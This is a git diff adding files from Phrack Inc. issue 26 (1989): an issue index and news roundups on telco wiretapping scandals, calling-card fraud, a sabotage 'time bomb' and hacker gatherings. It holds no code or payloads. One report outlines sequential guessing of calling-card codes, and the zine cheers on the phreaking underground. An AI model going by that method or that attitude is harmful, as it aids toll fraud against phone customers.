+pounds into his own account.  He then paid himself 12,000 in imaginary cheques.
+Later, he transferred a credit for 984,252 pounds into the account of a friend
+and celebrated by buying 50 bottles of champagne.
+
+The judge said, "One of the worrying features of this case is that a young man
+who hasn't long left school is able to work the system in the NatWest bank on a
+number of occasions without being found out.  Indeed, the general chat within
+the bank seems to be how easy it is to defraud that bank."
+_______________________________________________________________________________
+
+Two Men Accused Of "Hacker" Crime                             February 24, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By James Gribble (Milwaukee Journal)
+
+Vowing to step up efforts to stop computer crime, a Milwaukee County prosecutor
+has charged two Milwaukee men with fraudulently obtaining free long-distance
+telephone service.
+
+The felony charges filed Thursday against Alan Carr, age 35 and David Kelsey,
+age 26 are the first so-called hacker crimes to be prosecuted by the district
+attorney's office.
+
+Working independently, using home computers and similar software programs, the
+men are alleged to have obtained calling card codes for customers of an
+independent long-distance telephone company, Schneider Communications.
+
+They then used the codes to bill their personal calls to Schneider's customers,
+according to a criminal complaint prepared by Assistant District Attorney Jon
+N. Reddin, head of the district attorney's White Collar Crime Unit.
+
+Reddin said the total theft probably was less than $1,000, but he said the case
+reflected a growing problem.
+
+"I have the feeling, from our investigation, that there's a lot of people out
+there doing this," he said.  "The only way to stop it is to prosecute them,
+because this is theft.  It's almost like some one stealing your credit card and
+using it to make purchases."
+
+Schneider Communications was the victim in this case, Reddin said, because the
+company had to write off the customer billings for which Carr and Kelsey turned
+out to be responsible.
+
+According to court records and Reddin, the investigation was prompted by a
+complaint from Schneider Communications.
+
+The company's computer keeps track of all calls that are rejected because of an
+improper access code.  Clients dialing incorrectly would cause 10 to 30
+rejected calls a month, but sometime last year the number jumped to 1,000 or
+2,000 per month.
+
+Computer printouts showed the unknown parties were repeatedly dialing the
+computer and changing the access code sequentially, Reddin said.  Hundreds of
+calls at a time were being made in this fashion, and each time the code was
+changed one digit at a time until a working code was encountered.
+
+Because the company had no way of knowing where the calls were coming from,
+Wisconsin Bell placed a tracing device on the line, through which the calls
+were traced to the phone numbers of Carr and Kelsey.
+
+The men were apparently unaware of each other and simply happened to be
+involved in similar schemes, Reddin said.
+
+Carr is alleged to have used a bootleg computer program called "Hacking
+Construction Set Documentation."  Kelsey is alleged to have used a similar
+bootleg program called "Mickey-Dialer."  The programs were seized in raids at
+the defendant's houses, according to court records.
+
+Reddin acknowledged that technological safeguards can detect such thefts after
+the fact but not prevent them.  What Carr and Kelsey are alleged to have done
+can be done by any computer buff with the right software and know-how, Reddin
+said.
+
+The key to deterring computer crime, in Reddin's view, lies in it's prompt
+reporting to authorities.
+
+"The best way I can think of to do that is by filing a complaint with our
+office," Reddin said.
+_______________________________________________________________________________
diff --git a/phrack26/1.txt b/phrack26/1.txt
new file mode 100644
index 0000000..a454eab
--- /dev/null
+++ b/phrack26/1.txt
@@ -0,0 +1,49 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 26, File 1 of 11
+
+                    Phrack Inc. Newsletter Issue XXVI Index
+                    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+                                April 25, 1989
+
+
+     Greetings and welcome to Issue 26 of Phrack Inc.  Things are really
+beginning to heat up as SummerCon '89 rapidly approaches.  Be sure to check out
+Phrack World News for further information concerning this incredible event.
+You do not want to miss it.
+
+     This issue we feature The Disk Jockey's personal rendition of the events
+that can occur in the criminal legal process (after all he should know).  Some
+of the terms and situations may vary from state to state due to slight
+differences in state laws.
+
+     We also present to you a file on COSMOS that is written from more of a
+security standpoint rather than hacker intrusion tips.  The Future Transcendent
+Saga continues in this issue with a file on NSFnet and the third appendix of
+the never ending series.  This particular appendix is geared to be used as a
+general reference to chapter three of the FTSaga, "Limbo To Infinity."  As this
+file is more of a complied directory than actual "how to" knowledge, we just
+consider it a Phrack Inc. release.
+
+     As always, we ask that anyone with network access drop us a line to either
+our Bitnet or Internet addresses...
+
+               Taran King                        Knight Lightning
+          C488869@UMCVMB.BITNET                C483307@UMCVMB.BITNET
+       C488869@UMCVMB.MISSOURI.EDU          C483307@UMCVMB.MISSOURI.EDU
+_______________________________________________________________________________
+
+Table of Contents:
+
+1.  Phrack Inc. XXVI Index by Taran King and Knight Lightning
+2.  Computer-Based Systems for Bell System Operation by Taran King
+3.  Getting Caught:  Legal Procedures by The Disk Jockey
+4.  NSFnet:  National Science Foundation Network by Knight Lightning
+5.  COSMOS:  COmputer System for Mainframe OperationS (Part One) by King Arthur
+6.  Basic Concepts of Translation by The Dead Lord and Chief Executive Officers
+7.  Phone Bugging:  Telecom's Underground Industry by Split Decision
+8.  Internet Domains:  FTSaga Appendix 3 (Limbo To Infinity) by Phrack Inc.
+9.  Phrack World News XXVI/Part 1 by Knight Lightning
+10. Phrack World News XXVI/Part 2 by Knight Lightning
+11. Phrack World News XXVI/Part 3 by Knight Lightning
+_______________________________________________________________________________
diff --git a/phrack26/10.txt b/phrack26/10.txt
new file mode 100644
index 0000000..0717044
--- /dev/null
+++ b/phrack26/10.txt
@@ -0,0 +1,449 @@
+                                ==Phrack Inc.==
+
+                    Volume Three, Issue 26, File 10 of 11
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        %%%%%%%%%%%   %%%%%%%%%   %%%%%%%        PWN
+            PWN                Issue XXVI/Part 2                PWN
+            PWN                                                 PWN
+            PWN                 April 25, 1989                  PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Reach Out And TAP Someone                                         April 3, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%
+Two former employees of Cincinnati Bell, who were fired by the company for
+"good cause" according to Cincinnati Bell Chairman Dwight Hibbard are claiming
+they installed more than 1200 illegal wiretaps over a 12 year period from 1972
+- 1984 at the request of their supervisors at the telco and the local police.
+
+Among the alleged targets of the snooping were past and present members of
+Congress, federal judges, scores of the city's most prominent politicians,
+business executives, lawyers and media personalities.
+
+Leonard Gates and Robert Draise say they even wiretapped the hotel room where
+President Gerald Ford stayed during two visits to Cincinnati; and this part of
+their story, at least, has been verified by the now retired security chief at
+the hotel.
+
+As more details come out each day, people in Cincinnati are getting a rare look
+at a Police Department that apparently spied on itself, and at a grand jury
+probe that has prompted one former FBI official to suggest that the Justice
+Department seems more interested in discrediting the accusers than in seeking
+the truth.
+
+Cincinnati Bell executives says Gates and Draise are just trying to "get even"
+with the company for firing them.  But disclosures thus far seem to indicate
+there is at least some truth in what the two men are saying about the company
+they used to work for.
+
+According to Gates and Draise, they were just employees following the orders
+given to them by their superiors at Cincinnati Bell.  But Dwight Hibbard,
+Chairman of the Board of Cincinnati Bell has called them both liars, and said
+their only motive is to make trouble for the company.
+
+Cincinnati Bell responded to allegations that the company had specifically
+participated in illegal wiretapping by filing a libel suit against Gates and
+Draise.  The two men responded by filing a countersuit against the telco.
+In addition to their suit, four of the people who were allegedly spied on have
+filed a class action suit against the telco.
+
+In the latest development, Cincinnati Bell has gone public with (according to
+them) just recently discovered sordid details about an extramarital affair by
+Gates.  A federal grand jury in Cincinnati is now trying to straighten out the
+tangled web of charges and countercharges, but so far no indictments have been
+returned.
+
+Almost daily, Gates and Draise tell further details about their exploits,
+including taps they claim they placed on phones at the Cincinnati Stock
+Exchange and the General Electric aircraft engine plant in suburban Evendale.
+
+According to Draise, he began doing these "special assignments" in 1972, when
+he was approached by a Cincinnati police officer from that city's clandestine
+intelligence unit.  The police officer wanted him to tap the lines of black
+militants and suspected drug dealers, Draise said.
+
+The police officer assured him the wiretapping would be legal, and that top
+executives at the phone company had approved.  Draise agreed, and suggested
+recruiting Gates, a co-worker to help out.  Soon, the two were setting several
+wiretaps each week at the request of the Intelligence Unit of the Cincinnati
+Police Department.
+
+But by around 1975, the direction and scope of the operation changed, say the
+men.  The wiretap requests no longer came from the police; instead they came
+from James West and Peter Gabor, supervisors in the Security Department at
+Cincinnati Bell, who claimed *they were getting the orders from their
+superiors*.
+
+And the targets of the spying were no longer criminal elements; instead, Draise
+and Gates say they were asked to tap the lines of politicians, business
+executives and even the phone of the Chief of Police himself, and the personal
+phone lines of some telephone company employees as well.
+
+Draise said he "began to have doubts about the whole thing in 1979" when he was
+told to tap the private phone of a newspaper columnist in town.  "I told them I
+wasn't going to do it anymore," he said in an interview during the week of
+April 2, 1989.
+
+Gates kept on doing these things until 1984, and he says he got cold feet late
+that year when "the word came down through the grapevine" that he was to tap
+the phone lines connected to the computers at General Electric's Evendale
+plant.  He backed out then, and said to leave him out of it in the future, and
+he claims there were hints of retaliation directed at him at that time; threats
+to "tell what we know about you..."
+
+When Dwight Hibbard was contacted at his office at Cincinnati Bell and asked to
+comment on the allegations of his former employees, he responded that they were
+both liars.  "The phone company would not do things like that," said Hibbard,
+"and those two are both getting sued because they say we do."  Hibbard has
+refused to answer more specific questions asked by the local press and
+government investigators.
+
+In fact, Draise was fired in 1979, shortly after he claims he told his
+superiors he would no longer place wiretaps on lines.  Shortly after he quit
+handling the "special assignments" given to him he was arrested, and charged
+with a misdemeanor in connection with one wiretap -- which Draise says he set
+for a friend who wanted to spy on his ex-girlfriend.  Cincinnati Bell claims
+they had nothing to do with his arrest and conviction on that charge; but they
+"were forced to fire him" after he pleaded guilty.
+
+Gates was fired in 1986 for insubordination.  He claims Cincinnati Bell was
+retaliating against him for taking the side of two employees who were suing the
+company for sexual harassment; but his firing was upheld in court.
+
+The story first started breaking when Gates and Draise went to see a reporter
+at [Mount Washington Press], a small weekly newspaper in the Cincinnati
+suburban area.  The paper printed the allegations by the men, and angry
+responses started coming in almost immediately.
+
+At first, police denied the existence of the Intelligence Unit, let alone that
+such an organization would use operatives at Cincinnati Bell to spy on people.
+Later, when called before the federal grand jury, and warned against lying,
+five retired police officers, including the former chief, took the Fifth
+Amendment.  Finally last month, the five issued a statement through their
+attorney, admitting to 12 illegal wiretaps from 1972 - 1974, and implicated
+unnamed operatives at Cincinnati Bell as their contacts to set the taps.
+
+With the ice broken, and the formalities out of the way, others began coming
+forward with similar stories.  Howard Lucas, the former Director of Security
+for Stouffer's Hotel in Cincinnati recalled a 1975 incident in which he stopped
+Gates, West and several undercover police officers from going into the hotel's
+phone room about a month before the visit by President Ford.
+
+The phone room was kept locked, and employees working there were buzzed in by
+someone already inside, recalled Lucas.  In addition to the switchboards, the
+room contained the wire distribution frames from which phone pairs ran
+throughout the hotel.  Lucas refused to let the police officers go inside
+without a search warrant; and they never did return with one.
+
+But Lucas said two days later he was tipped off by one of the operators to look
+in one of the closets there.  Lucas said he found a voice activated tape
+recorder and "a couple of coils they used to make the tap."  He said he told
+the Police Department and Cincinnati Bell about his findings, but "...I could
+not get anyone to claim it, so I just yanked it all out and threw it in the
+dumpster..."
+
+Executives at General Electric were prompted to meet with Draise and Gates
+recently to learn the extent of the wiretapping that had been done at the
+plant.  According to Draise, GE attorney David Kindleberger expressed
+astonishment when told the extent of the spying; and he linked it to the
+apparent loss of proprietary information to Pratt & Whitney, a competing
+manufacturer of aircraft engines.
+
+Now all of a sudden, Kindleberger is clamming up.  I wonder who got to him?  He
+admits meeting with Draise, but says he never discussed Pratt & Whitney or any
+competitive situation with Draise.  But an attorney who sat in on the meeting
+supports Draise's version.
+
+After an initial flurry of press releases denying all allegations of illegal
+wiretapping, Cincinnati Bell has become very quiet, and is now unwilling to
+discuss the matter at all except to tell anyone who asks that "Draise and Gates
+are a couple of liars who want to get even with us..."  And now, the telco
+suddenly has discovered information about Gates' personal life.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+FBI/Bell Wiretapping Network?                                     April 3, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+                        [Edited For This Presentation]
+
+Bob Draise/WB8QCF was an employee of Cincinnati Bell Telephone between 1966 and
+1979.  He, and others, are involved in a wiretapping scandal of monumental
+proportions.  They say they have installed more than 1,000 wiretaps on the
+phones of judges, law enforcement officers, lawyers, television personalities,
+newspaper columnists, labor unions, defense contractors, major corporations
+(such as Proctor & Gamble and General Electric), politicians (even ex-President
+Gerald Ford) at the request of Cincinnati police and Cincinnati Bell security
+supervisors who said the taps were for the police.  They were told that many of
+the taps were for the FBI.
+
+Another radio amateur, Vincent Clark/KB4MIT, a technician for South-Central
+Bell from 1972 to 1981, said he placed illegal wiretaps similar to those done
+by Bob Draise on orders from his supervisors -- and on request from local
+policemen in Louisville, Kentucky.
+
+When asked how he got started in the illegal wiretap business, Bob said that a
+friend called and asked him to come down to meet with the Cincinnati police. An
+intelligence sergeant asked Bob about wiretapping some Black Muslims.  He also
+told Bob that Cincinnati Bell security had approved the wiretap -- and that it
+was for the FBI.  The sergeant pointed to his Masonic ring which Bob also wore
+-- in other words, he was telling the truth under the Masonic oath -- something
+that Bob put a lot of stock in.
+
+Most of the people first wiretapped were drug or criminal related.  Later on,
+however, it go out of hand -- and the FBI wanted taps on prominent citizens.
+"We started doing people who had money.  How this information was used, I
+couldn't tell you."
+
+The January 29th "Newsday" said Draise had told investigators that among the
+taps he rigged from 1972 to 1979 were several on lines used by Wren Business
+Communications, a Bell competitor.  It seems that when Wren had arranged an
+appointment with a potential customer, they found that Bell had just been there
+without being called.  Wren's president is a ham radio operator, David
+Stoner/K8LMB.
+
+When spoken with, Dave Stoner said the following;
+
+     "As far as I am concerned, the initial focus for all of this began
+     with the FBI.  The FBI apparently set up a structure throughout the
+     United States using apparently the security chiefs of the different
+     Bell companies.  They say that there have been other cases in the
+     United States like ours in Cincinnati but they have been localized
+     without the realization of an overall pattern being implicated."
+
+     "The things that ties this all together is if you go way back in
+     history to the Hoover period at the FBI, he apparently got together
+     with the AT&T security people.  There is an organization that I
+     guess exists to this day with regular meetings of the security
+     people of the different Bell companies.  This meant that the FBI
+     would be able to target a group of 20 or 30 people that represented
+     the security points for all of the Bell and AT&T connections in the
+     United States.  I believe the key to all of this goes back to Hoover.
+     The FBI worked through that group who then created the activity at
+     the local level as a result of central planning."
+
+     "I believe that in spite of the fact that many people have indicated
+     that this is an early 70's problem -- that there is no disruption to
+     that work to this day.  I am pretty much convinced that it is
+     continuing.  It looks like a large surveillance effort that
+     Cincinnati was just a part of."
+
+     "The federal prosecutor Kathleen Brinkman is in a no-win situation.
+     If she successfully prosecutes this case she is going to bring
+     trouble down upon her own Justice Department.  She can't
+     successfully prosecute the case."
+
+About $200 million in lawsuits have already been filed against Cincinnati Bell
+and the Police Department.  Several members of the police department have taken
+the Fifth Amendment before the grand jury rather than answer questions about
+their roles in the wiretapping scheme.
+
+Bob Draise/WB8QCF has filed a suit against Cincinnati Bell for $78 for
+malicious prosecution and slander in response to a suit filed by Cincinnati
+Bell against Bob for defamation.  Right after they filed the suit, several
+policemen came forward and admitted to doing illegal wiretaps with them.  The
+Cincinnati police said they stopped this is 1974 -- although another policeman
+reportedly said they actually stopped the wiretapping in 1986.
+
+Now the CBS-TV program "60 Minutes" is interested in the Cincinnati goings-on
+and has sent in a team of investigative reporters.  Ed Bradley from "60
+Minutes" has already interviewed Bob Draise/WB8QCF and it is expected that
+sometime during this month (April) April, we will see a "60 Minutes" report on
+spying by the FBI.  We also understand that CNN, Ted Turner's Cable News
+Network, is also working up a "Bugging of America" expose.
+_______________________________________________________________________________
+
+Crackdown On Hackers Urged                                        April 9, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%
+Taken From the Chicago Tribune (Section 7, Page 12b)
+
+            "Make Punishment Fit The Crime," computer leaders say.
+
+DALLAS (AP) -- The legal system has failed to respond adequately to the threat
+that hackers pose to the computer networks crucial to corporate America, a
+computer expert says.
+
+Many computer hackers "are given slaps on the wrist," Mark Leary, a senior
+analyst with International Data Corp., said at a roundtable discussion last
+week.
+
+"The justice system has to step up...to the fact that these people are
+malicious and are criminals and are robbing banks just as much as if they
+walked up with a shotgun," he said.
+
+Other panelists complained that hackers, because of their ability to break into
+computer systems, even are given jobs, sometimes a security consultants.
+
+The experts spoke at a roundtable sponsored by Network World magazine, a
+publication for computer network users and managers.
+
+Computer networks have become crucial to business, from transferring and
+compiling information to overseeing and running manufacturing processes.
+
+The public also is increasingly exposed to networks through such devices as
+automatic teller machines at banks, airline reservation systems and computers
+that store billing information.
+
+Companies became more willing to spend money on computer security after last
+year's celebrated invasion of a nationwide network by a virus allegedly
+unleased by a graduate student [Robert Tappen Morris], the experts said.
+
+"The incident caused us to reassess the priorities with which we look at
+certain threats," said Dennis Steinaur, manager of the computer security
+management group of the National Institute of Standards and Technology.
+
+But computer security isn't only a matter of guarding against unauthorized
+entry, said Max Hopper, senior vice president for information systems as
+American Airlines.
+
+Hopper said American has built a "a Cheyenne mountain-type" installation for
+its computer systems to guard against a variety of problems, including
+electrical failure and natural disaster.  Referring to the Defense Department's
+underground nerve center in a Colorado mountain, he said American's precautions
+even include a three-day supply of food.
+
+"We've done everything we can, we think, to protect the total environment,"
+Hopper said.
+
+Hopper and Steinaur said that despite the high-tech image of computer
+terrorism, it remains an administrative problem that should be approached as a
+routine management issue.
+
+But the experts agreed that the greatest danger to computer networks does not
+come from outside hackers.  Instead, they said, the biggest threat is from
+disgruntled employees or others whose original access to systems was
+legitimate.
+
+Though employee screening is useful, Steinaur said, it is more important to
+build into computer systems ways to track unauthorized use and to publicize
+that hacking can be traced.
+
+Steinaur said growing computer literacy, plus the activities of some
+non-malicious hackers, help security managers in some respects.
+
+Expanded knowledge "forces us as security managers not be dependent on
+ignorance," Steinaur said.
+
+"Security needs to be a part of the system, rather than a 'nuisance addition,'"
+Steinaur said, "and we probably have not done a very good job of making
+management realize that security is an integral part of the system."
+
+IDC's Leary said the organization surveys of Fortune 1000 companies
+surprisingly found a significant number of companies were doing little to
+protect their systems.
+
+The discussion, the first of three planned by Network World, was held because
+computer sabotage "is a real problem that people aren't aware of," said editor
+John Gallant.  Many business people sophisticated networks."
+
+It also is a problem that many industry vendors are reluctant to address, he
+said, because it raises questions about a company's reliability.
+
+                        Typed For PWN by Hatchet Molly
+_______________________________________________________________________________
+
+Ex-Worker Charged In Virus Case -- Databases Were Alleged Target   Apr 12, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+by Jane M. Von Bergen (Philadelphia Inquirer)
+
+A former employee was charged yesterday with infecting his company's computer
+database in what is believed to be the first computer-virus arrest in the
+Philadelphia area.
+
+"We believe he was doing this as an act of revenge," said Camden County
+Assistant Prosecutor Norman Muhlbaier said yesterday, commenting on a motive
+for the employee who allegedly installed a program to erase databases at his
+former company, Datacomp Corp. in Voorhees, New Jersey.
+
+Chris Young, 21, of the 2000 block of Liberty Street, Trenton, was charged in
+Camden County with one count of computer theft by altering a database.
+Superior Court Judge E. Stevenson Fluharty released Young on his promise to pay
+$10,000 if he failed to appear in court.  If convicted, Young faces a 10-year
+prison term and a $100,000 fine.  Young could not be reached for comment.
+
+"No damage was done," Muhlbaier said, because the company discovered the virus
+before it could cause harm.  Had the virus gone into effect, it could have
+damaged databases worth several hundred thousand dollars, Muhlbaier said.
+
+Datacomp Corp., in the Echelon Mall, is involved in telephone marketing.  The
+company, which has between 30 and 35 employees, had a contract with a major
+telephone company to verify the contents of its white pages and try to sell
+bold-faced or other special listings in the white pages, a Datacomp company
+spokeswoman said.  The database Young is accused of trying to destroy is the
+list of names from the phone company, she said.
+
+Muhlbaier said that the day Young resigned from the company, October 7, 1988 he
+used fictitious passwords to obtain entry into the company computer,
+programming the virus to begin its destruction December 7, 1988 -- Pearl Harbor
+Day.  Young, who had worked for the company on and off for two years -- most
+recently as a supervisor -- was disgruntled because he had received some
+unfavorable job-performance reviews, the prosecutor said.
+
+Eventually, operators at the company picked up glitches in the computer system.
+A programmer, called in to straighten out the mess, noticed that the program
+had been altered and discovered the data-destroying virus, Muhlbaier said.
+"What Mr. Young did not know was that the computer system has a lot of security
+features so they could track it back to a particular date, time and terminal,"
+Muhlbaier said.  "We were able to ... prove that he was at that terminal."
+Young's virus, Muhlbaier said, is the type known as a "time bomb" because it is
+programmed to go off at a specific time.  In this case, the database would have
+been sickened the first time someone switched on a computer December 7, he said
+
+Norma Kraus, a vice president of Datacomp's parent company, Volt Information
+Sciences Inc, said yesterday that the company's potential loss included not
+only the databases, but also the time it took to find and cure the virus.  "All
+the work has to stop," causing delivery backups on contracts, she said.  "We're
+just fortunate that we have employees who can determine what's wrong and then
+have the interest to do something.  In this case, the employee didn't stop at
+fixing the system, but continued on to determine what the problem was." The
+Volt company, based in New York, does $500 million worth of business a year
+with such services as telephone marketing, data processing and technical
+support.  It also arranges temporary workers, particularly in the
+data-processing field, and installs telecommunication services, Kraus said.
+_______________________________________________________________________________
+
+Mexico's Phone System Going Private?                             April 17, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+By Oryan QUEST (Special Hispanic Corespondent)
+
+The Mexico Telephone Company, aka Telefonos de Mexico, aka Telmex, is likely to
+go private in the next year or two.  The Mexican government is giving serious
+consideration to selling its controlling interest in that nation's
+communications network, despite very stiff opposition from the local unions
+which would prefer to see the existing bureaucracy stay in place.
+
+The proposed sale, which is part of a move to upgrade the phone system there --
+and it *does* need upgrading -- by allowing more private investment, is part of
+a growing trend in Mexico to privatize heretofore nationalized industries.
+
+The Mexico Telephone Company has spent more than a year planning a $14 billion,
+five-year restructuring plan which will probably give AT&T and the Bell
+regional holding companies a role in the improvements.
+
+One plan being discussed by the Mexican government is a complete break-up of
+Telmex, similar to the court-ordered divestiture of AT&T a few years ago.
+Under this plan, there would be one central long distance company in Mexico,
+with the government retaining control of it, but privately owned regional firms
+providing local and auxiliary services.
+
+Representatives of the Mexican government have talked on more than one
+occasion with some folks at Southwestern Bell about making a formal proposal.
+Likewise, Pacific Bell has been making some overtures to the Mexicans.  It will
+be interesting to see what develops.
+
+About two years ago, Teleconnect Magazine, in a humorous article on the
+divestiture, presented a bogus map of the territories assigned to each BOC,
+with Texas, New Mexico and Arizona grouped under an entity called "Taco Bell."
+
+Any phone company which takes over the Mexican system will be an improvement
+over the current operation, which has been slowly deteriorating for several
+years.
+
+PS:  I *Demand* To Be Let Back On MSP!
+_______________________________________________________________________________
diff --git a/phrack26/11.txt b/phrack26/11.txt
new file mode 100644
index 0000000..d07a60f
--- /dev/null
+++ b/phrack26/11.txt
@@ -0,0 +1,907 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 26, File 11 of 11
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        %%%%%%%%%%%   %%%%%%%%%   %%%%%%%        PWN
+            PWN                Issue XXVI/Part 3                PWN
+            PWN                                                 PWN
+            PWN                 April 25, 1989                  PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Galactic Hacker Party                                            March 30, 1989
+%%%%%%%%%%%%%%%%%%%%%
+                             GALACTIC HACKER PARTY
+                               August 2-4, 1989
+                         PARADISO, AMSTERDAM, HOLLAND
+
+During the summer of 1989, the world as we know it will go into overload.  An
+interstellar particle stream of hackers, phone phreaks, radioactivists and
+assorted technological subversives will be fusing their energies into a media
+melt-down as the global village plugs into Amsterdam for three electrifying
+days of information interchange and electronic capers.
+
+Aided by the advanced communications technology to which they are accustomed,
+the hacker forces will discuss strategies, play games, and generally have a
+good time.  Free access to permanently open on-line facilities will enable them
+to keep in touch with home base -- wherever that is.
+
+Those who rightly fear the threat of information tyranny and want to learn what
+they can do about it are urgently invited to interface in Amsterdam in August.
+There will be much to learn from people who know.  Celebrity guests with
+something to say will be present in body or electronic spirit.
+
+The Force must be nurtured.  If you are refused transport because your laptop
+looks like a bomb, cut off behind enemy lines, or unable to attend for any
+other reason, then join us on the networks.  Other hacker groups are requested
+to organize similar gatherings to coincide with ours.  We can provide low-cost
+international communications links during the conference.
+
+       [  Despite the wishes of those planning the "Galactic Hacker   ]
+       [  Party," there will be NO change in plans for SummerCon '89! ]
+
+For further information, take up contact as soon as possible with:
+
+             HACK-TIC                           PARADISO
+             P.O. box 22953                     Weteringschans 6-8
+             1100 DL  Amsterdam                 1017 SG  Amsterdam
+             The Netherlands                    The Netherlands
+
+         tel: +31 20 6001480                tel: +31 20 264521 / +31 20 237348
+_______________________________________________________________________________
+
+Subversive Bulletin Boards                                       March 26, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%
+An article in a newspaper from the United Kingdom had an article relating to a
+computer bulletin board being run by a 14-year-old boy in Wilmslow, Cheshire,
+England.  It contained information relating to such things as making plastic
+explosives.
+
+Anti-terrorist detectives are said to be investigating for possible breaches of
+the Obscene Publications Act.  Apparently reporters were able to easily gain
+access to this bulletin board and peruse articles on such subjects as credit
+card fraud, making various types of explosives, street fighting techniques and
+dodging police radar traps.
+
+One article was obviously aimed at children and described how to make a bomb
+suitable for use on "the car of a teacher you do not like at school," which
+would destroy the tire of a car when it was started.
+
+The boy's parents did not seem to think that their son was doing anything
+wrong, preferring him to be working with his computer rather than roaming the
+streets.
+
+A London computer consultant, Noel Bradford, is quoted as having seen the
+bulletin board and found messages discussing "how to crack British Telecom, how
+to get money out of people and how to defraud credit card companies.  Credit
+card numbers are given, along with PIN numbers, names, addresses and other
+details."
+_______________________________________________________________________________
+
+Tale Of TWO TAP Magazines!                                       April 24, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%
+It seemed inevitable that the battle for the rights to TAP would come into
+play, but many wonder why it has taken so long.
+
+The Renegade Chemist, long time member of Phortune 500 and one of its "Board Of
+Directors," has been talking about re-starting TAP Magazine for at least two
+years... nothing ever happened with it until now.  TRC claims that the TAP
+Magazine crew in Kentucky is just a fraud and that he is putting on the "REAL
+McCoy."
+
+For a free issue of The Renegade Chemist's TAP Magazine, send a self-addressed
+stamped envelope to:
+
+Data Security Consultants, Inc.
+TAP Magazine
+P.O. Box 271
+South Windam, CT  06266-0271
+
+Now on the other hand, Aristotle of the Kentucky based TAP Magazine has shown
+an almost uncaring attitude about The Renegade Chemist's statements about TAP
+Magazine.  He says that he does not "really mind if these people put out a
+magazine.  Honestly I just want to help the community and the more magazines
+and information, the better."
+
+The really big news about the Kentucky based TAP Magazine came Saturday, April
+22, 1989.  Apparently, because of problems with local banks and the Internal
+Revenue Service, TAP Magazine is now FREE!
+
+The only catch is that if you want it, you have to send them a self-addressed
+stamped envelope to get each issue or "you can send cash, but only enough to
+pay for postage, 25 cents should cover it."  Do not send any kinds of checks
+and/or money orders.  Anyone who did will be receiving their checks back or
+at least those checks will not be cashed.  The TAP Magazine staff will be
+taking care of the printing costs out of their own pocket.
+
+So for the FREE TAP Magazine, send a self-addressed stamped envelope to:
+
+P.O. Box 20264
+Louisville, KY  40220
+
+Issue 93 is due for the end of April 1989, but Aristotle also wanted me to let
+everyone know that he will be attending SummerCon '89 and bringing with him
+plenty of issues of all the TAPs that he, Olorin The White, and Predat0r have
+published.
+
+As I have not seen TRC's TAP, I make no judgements.  Instead, get a copy of
+both TAPs FREE and compare them yourself.  The market will decide which TAP
+will continue.
+
+                            Information Provided by
+                      Aristotle and The Renegade Chemist
+_______________________________________________________________________________
+
+Computer Group Wary Of Security Agency                           April 11, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Taken from the San Francisco Chronicle
+
+A public interest group said yesterday that the National Security Agency, the
+nation's biggest intelligence agency, could exert excessive control over a
+program to strengthen the security of computer systems throughout the federal
+government.
+
+The group, Computer Professionals for Social Responsibility -- based in Palo
+Alto -- urged key members of Congress to focus "particularly close scrutiny" on
+the agency's role in helping to implement legislation aimed at safeguarding
+sensitive but unclassified information in federal computers.
+
+"There is a constant risk that the federal agencies, under the guise of
+enhancing computer security, may find their programs -- to the extent that they
+rely upon computer systems -- increasingly under the supervision of the largest
+and most secretive intelligence organization in the country," it said.
+_______________________________________________________________________________
+
+Verifying Social Security Numbers                                April 11, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Taken From The New York Times
+
+Dorcas R. Hardy, Commisssioner of the Social Security Administration, told a
+Congressional committee that the agency had verified millions of SSN's for
+private credit companies.
+
+TRW, the nation's largest credit reporting company, recently proposed paying
+the Social Security Administration $1,000,000 to have 140 million numbers
+verified.
+
+Phil Gambino, an agency spokesman, reported last month that the agency had
+verified social security numbers only at the request of beneficiaries or
+employers and had never verified more than 25 numbers at a time.  He said such
+disclosures were required under the Freedom of Information Act.
+
+At the hearing yesterday, Dorcas R. Hardy, denied any other verifications at
+first.  However, she later admitted that in the early 1980s, 3,000,000 social
+security numbers were verified for CitiCorp and that last year 151,000 numbers
+were verified for TRW.  Ms. Hardy said that the 151,000 numbers were just part
+of a "test run."
+
+Senator David Pryor, a democrat from Arkansas and chairman of the Special
+Committee on Aging, said that previous commissioners; the Congressional
+Research Service of the Library of Congress, and Donald A. Gonya, chief counsel
+for Social Security have all decided that such verification is illegal.
+_______________________________________________________________________________
+
+PWN Quicknotes
+
+1.  Prank Virus Warning Message (March 28, 1989) -- An individual placed a time
+    bomb message on a government service system in the San Francisco Bay Area
+    saying, "WARNING! A computer virus has infected the system!"  The
+    individual is learning that such a prank is considered almost as funny as
+    saying that you have a bomb in your carry-on luggage as you board a plane.
+    -- Bruce Baker, Information Security Program, SRI International
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
